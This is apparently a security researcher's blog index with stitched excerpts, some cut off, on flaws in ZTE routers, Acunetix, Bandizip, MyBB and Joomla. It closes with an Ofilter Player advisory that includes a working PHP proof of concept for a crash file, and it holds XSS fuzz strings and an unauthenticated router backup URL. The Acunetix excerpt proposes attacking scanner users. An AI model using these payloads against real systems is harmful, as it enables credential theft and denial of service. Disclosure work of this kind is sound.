In ZTE routers the username is a constant which is āadminā and the password by default is āadminā
There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request.
http://192.168.1.1/rom-0 (more…)
I think by now you know the security issues disclosed related to TP-Link routers. Iāve noticed that some ZTE and TP-Link routers have the same ADSL firmware which is āFwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0ā. I was curious to test the web application and I found out that the embedded server which is āRomPagerā cannot handle fairly large POST requests.
Tested Routers:
Xilisoft Video Converter Ultimate is a professional video converter which has a wide rangeĀ of video and audio formats. I personally love this software since it uses GPU acceleration in converting videos.
It is on the high side of premium video converters for home use. It automatic profiles enhanced for just any device or format, graphics card detection and acceleration.
-CNET
Recently a security researcher named āDanor Cohen – An7iā had found a buffer overflow vulnerability and he has written a nice exploit for Acunetix Web Vulnerability Scanner 8.0. As this exploit was an ascii based one I was interested in re-writing the exploit because my previous exploit was also an ascii based one. However with the emerging of bug bounties and responsible disclosure policies Iāve seen many people firing up web application security scanners against live hosts in which automated vulnerability assessments are not permitted at all. Well, by triggering this buffer overflow vulnerability we can have some fun owning the noobs š
When we submit a new website to be scanned by Acunetix it searches for html tags like <img src=āā >, <a href=āā> to get the additional hosts from that website. So if we place an html tag in the page like (more…)
All these issues are patched in Bandizip 3.10 after a responsible disclosure done to the vendor.
Bandizip is a Lightweight, Fast and 100% free All-In-One Zip Archiver. ItĀ has a very fast Zip algorithm for compression & extraction with Fast Drag and Drop, High Speed Archiving, and Multi-core compression. It handles the most popular compression formats, including Zip, 7z, Rar, and so on.
Bandizip 3.09 and below version are affected with a DLL hijacking issue in which the application loadsĀ dwmapi.dll in an insecure manner.Ā Ā This can be exploited to load arbitrary libraries by tricking a user into e.g. opening a file located on a remote WebDAV or SMB share. 
You can clearly seeĀ dwmapi.dll is being searched by the application in the current directory as a result of loading it in an insecure manner.
This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given.
alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
MyBB throws out a SQL error:
[code language=”sql”]
SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE ‘moved|%’
AND ( LOWER(t.subject) LIKE ‘%<foo> <h1> <script> alert (bar) () ; //%’ LOWER(t.subject)
LIKE ‘%> < prompt \x41 \%42 constructor onload%’)
[/code]
Last October 2013 I found some XSS vulnerabilities in Joomla! 3.1.2. Anyhow the affected versions were Joomla! version 2.5.14 and earlier 2.5.x versions and version 3.1.5 and earlier 3.0.x
versions. Actually all these XSS vulnerabilities existed on fields where we can insert links starting with http://. I first did a simple fuzz to test the output.
<foo> </bar> '" > <> ; () //
What I noticed was that it does filter out tags but still we can take advantage of these non-filtered characters. Of course we can use event handlers in JavaScript to trigger XSS.
ā; ()//"
To reproduce this issue follow these steps.
This is how Microsoft describes it
When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described inĀ Dynamic-Link Library Search Order. If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called aĀ DLL preloading attackĀ or aĀ binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compromised directory, it loads the malicious DLL. If the application is running with administrator privileges, the attacker may succeed in local privilege elevation.
Basically when an application tries to load a DLL without specifying a fully qualified path name Windows tries to load the DLL in a order of directories. If the application attempts to load a DLL by it’s name it should go in this order of directories (x86).
1. Advisory Information
Title:Ā Ofilter Player WAV File Handling Division-by-zero DoS Weakness
Advisory URL:Ā https://osandamalith.com/2014/01/10/ofilter-player-wav-file-handling-division-by-zero-dos-weakness/
Date published: 2014-01-10
Vendors contacted: 008soft
Release mode: User release
2. Vulnerability Information
Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Summary
Easy Karaoke Player is a software that is playing karaoke, recording karaoke songs to wav format files. This application is able to read all types of multimedia files with an integrated multimedia player that is both efficient and full-powered.
4. Vulnerability Description
Ofilter Player contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a division-by-zero error and a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).
5. Vulnerable Packages
6. Credits
This bug was researched by Osanda Malith Jayathissa.
7. Proof of Concept / Technical Details
[code language=”php”]
<?php
/*
*Title: Ofilter Player 1.1 (.wav) Integer Division by Zero
*Version: 1.1
*Tested on: Windows XP SP2 en
*Vendor: http://www.008soft.com/
*Software Link: http://www.008soft.com/downloads_OfilterPlayer.exe
*E-Mail: OsandaJayathissa@gmail.com
*Bug Discovered by: Osanda Malith
*Twitter: @OsandaMalith
* /!\ Author is not responsible for any damage you cause
* This POC is for educational purposes only
*/
$poc=
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
file_put_contents("ofilterplayer.wav", $poc);
print <<< str
[+] Ofilter Player 1.1 Integer Division by Zero
[+] by Osanda Malith (@OsandaMalith)
[~] File Created "ofilterplayer.wav"
str;
?>
[/code]
8. Report Timeline
2013-09-19: The researcher notifies the vendor 008soft.
2013-09-23:Ā The researcher attempts to contact the vendor
2013-10-05:Ā The researcher attempts to contact the vendor
2014-01-10: Advisory and public disclosure
9. Ā DisclaimerĀ
The information contained within this advisory is supplied āas-isāĀ with no warranties or guarantees of fitness of use or otherwise.Ā I accept no responsibility for any damage caused by the use or misuseĀ of this information.
10. References
[1]Ā http://packetstormsecurity.com/files/124610/Ofilter-Player-1.1-Integer-Division-By-Zero.html
[2] http://www.exploit-db.com/exploits/30550
